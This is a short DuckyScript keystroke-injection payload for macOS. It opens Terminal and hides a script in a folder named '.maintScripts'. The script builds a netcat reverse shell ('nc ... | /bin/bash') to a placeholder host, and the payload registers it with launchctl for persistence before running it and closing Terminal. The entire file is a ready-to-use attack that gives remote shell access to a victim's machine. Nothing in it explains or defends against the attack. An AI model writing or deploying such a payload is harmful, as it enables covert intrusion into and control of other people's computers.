GUI SPACE
DELAY 500
STRING terminal
DELAY 1000
ENTER
DELAY 1000
STRING cd ~
ENTER
STRING mkdir .maintScripts
ENTER
STRING cd .maintScripts
ENTER
STRING touch script.sh
ENTER
STRING echo "mkfifo foo" > script.sh
ENTER
STRING echo "nc ipport <foo | /bin/bash 1>foo" >> script.sh
ENTER
STRING chmod +rwx script.sh
ENTER
STRING launchctl submit -l someName -p ~/.maintScripts/script.sh
ENTER
STRING ./script.sh&
ENTER
STRING exit
ENTER
DELAY 600
GUI q
